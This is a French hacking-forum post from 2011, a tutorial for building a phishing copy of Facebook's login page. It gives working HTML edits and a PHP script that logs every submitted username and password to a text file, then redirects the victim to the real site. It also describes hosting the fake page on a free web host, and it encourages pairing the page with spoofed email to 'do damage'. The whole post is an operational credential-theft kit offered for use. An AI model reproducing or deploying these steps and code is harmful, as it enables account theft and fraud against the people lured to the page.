Apprendre le Hack Index du Forum
Apprendre le Hack

 
Apprendre le Hack Index du ForumFAQRechercherS’enregistrerConnexion

:: tutoriel de phishing ::

 
Poster un nouveau sujet   Répondre au sujet    Apprendre le Hack Index du Forum -> A trié
Sujet précédent :: Sujet suivant  
Auteur Message
Inf3rnus
Administrateur

Hors ligne

Inscrit le: 22 Aoû 2011
Messages: 196

MessagePosté le: Dim 11 Déc - 07:31 (2011)    Sujet du message: tutoriel de phishing Répondre en citant

Bonjour ,

Je vais vous montrez comment créer une page de phishing en quelques minutes

pré-requis:
lire ces tutos:
le cours html et formulaire php dont les liens ce trouvent dans ce tuto http://hack.xooit.com/t146-How-to-become-a-H-ck3r.htm#p185
lire cet autre tuto: http://hack.xooit.com/t147-le-protocole-SMTP-et-la-mail-bombing-le-spam-et-…

Pour ce tuto j'ai choisis le site Facebook (encore lui), mais il est valable pour la plupart des site (dofus, habbo, msn etc..).

Premièrement : Allez sur http://www.google.fr et tapez fb puis enter



cliquez sur cache et attendez, quand vous arriverez sur cette page faite cette manipulation: CTRL + S

Cette manipulation permet de ne pas devoir refaire tout les lien vers les images du site.



au moment d'enregistrer nommez la page principale index.html,
ouvrez le fichier index.html dans un éditeur de texte comme bloc-notes, dans se bloc notes allez
dans le code retirer la partie du header de google pour n'avoir que celle de facebook,


  1. <!-- base href="http://fr-fr.facebook.com/" --><script async="" type="text/javascript" src="index_fichiers/cszPs1JPKE9.js"></script><script async="" type="text/javascript" src="index_fichiers/19FLPsnrVCD.js"></script><script async="" type="text/javascript" src="index_fichiers/2Gxt2Kl4nW6.js"></script><script async="" type="text/javascript" src="index_fichiers/M_8JF8QGN6-.js"></script></head><body class="fbIndex UIPage_LoggedOut Locale_fr_FR"><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">Ceci est le cache Google de <a href="http://fr-fr.facebook.com/" style="text-decoration: underline; color: rgb(0, 0, 204);">http://fr-fr.facebook.com/[/url]. Il s'agit d'un instantané de la page telle qu'elle était affichée le 5 juil. 2011 02:54:42 GMT. La <a href="http://fr-fr.facebook.com/" style="text-decoration: underline; color: rgb(0, 0, 204);">page actuelle[/url] peut avoir changé depuis cette date. <a href="http://www.google.com/intl/fr/help/features_list.html#cached" style="text-decoration: underline; color: rgb(0, 0, 204);">En savoir plus[/url]  
  2.   
  3. <div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:HDYVNZGF1RIJ:fr-fr.facebook.com/+fb&amp;hl=fr&amp;gl=be&amp;strip=1" style="text-decoration: underline; color: rgb(0, 0, 204);">Version en texte seul[/url]
      

  4. Ces termes apparaissent uniquement dans les liens pointant sur cette page : <span style="font-weight:bold">fb</span>&nbsp;&nbsp;


    <div style="position:relative">  





ensuite
faites CTRL + F et recherchez "Action"

Vous devez trouver sa :

form method="POST" action="https://login.facebook.com/login.php?login_attempt=1"

Deuxièmement :

créer une page avec votre éditeur de texte et mettez ceci dedans:
 




  1. <?php  
  2.   
  3. header ('Location: ');  
  4.   
  5. $handle = fopen("usernames.txt", "a");  
  6.   
  7. foreach($_POST as $variable => $value) {  
  8.   
  9.    fwrite($handle, $variable);  
  10.   
  11.    fwrite($handle, "=");  
  12.   
  13.    fwrite($handle, $value);  
  14.   
  15.    fwrite($handle, "\r\n");  
  16.   
  17. }  
  18.   
  19. fwrite($handle, "\r\n");  
  20.   
  21. fclose($handle);  
  22.   
  23. exit;  
  24.   
  25. ?>   





Expliqu'on le code php

fopen = veux dire ouvrir un fichier dans l'exemple il sera un fichier texte (.txt)
fwrite = on écrit dans le fichier les $variable du code form du fichier html
fclose = on ferme le fichier
exit = on quitte



Une fois fait renommez le post.php

Apres dans le bloc notes avec tout le code source re allait a l'endroit ou vous avez cherché Action il doit avoir un lien de site a cotez de :
form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" Remplacez [https://login.facebook.com/login.php?login_attempt=1] par "post.php".

Maintenant que c'est fait , enregistrez-le

Et allez dans le fichier post.php sur votre bureau normalement , ouvrez le et à la deuxième ligne il y a marqué : header ('Location: et mettez http://www.facebook.com/ ')

C'est finie pour le 1er partie passez a la deuxième : Allez sur http://www.110mb.com
Appuyez sur Get a free account !
Remplissez tout, (choississez un nom qui commence par application ^^) après vous devez recevoir un 1er e-mail à l'adresse que vous avez mis.

Re-remplissez les champ et la vous devez recevoir un 2eme e-mail avec dedans le lien pour votre Contrôle Panel
Des que vous y êtes cliquez sur File Manager vous devez arrivez a sa :



Cochez index.htm et faites Delete Selected
Après cliquez sur New directory et écrivez index.html

Des que vous avez créé un autre index.html allez dessus et faites Upload files et mettez les 2 fichier ( index.html et post.php )
Faites Upload

Et voila votre site de phishing est prêt
Pour voir votre site c'est simple

Vous allez dans votre 2eme e-mail reçu et cliquez sur le lien a cotez de Domain : sa doit être votre ussername.110mb.com

Pour recevoir les identifiant et mot de passe des que vous aurez taper sur votre site piège les identifiant et mot de passe allez dans l'endroit ou il y a index.html et post.php et vous devrez voir un fichier username.txt crée avec tout les login dedans.

couplez cela avec la faille smtp et un spoof DNS pour envoyer un mail spoofé et vous ferez des dégat.

Liens des tuto spoofing

http://hack.xooit.com/t148-Le-spoofing.htm#p187

http://hack.xooit.com/t147-le-protocole-SMTP-et-la-mail-bombing-le-spam-et-…

Voila , pour toute questions, n'hésitez pas =D


Revenir en haut
Publicité






MessagePosté le: Dim 11 Déc - 07:31 (2011)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    Apprendre le Hack Index du Forum -> A trié Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1

 
Sauter vers:  




Index | creer un forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
Powered by phpBB © 2001, 2005 phpBB Group
Traduction par : phpBB-fr.com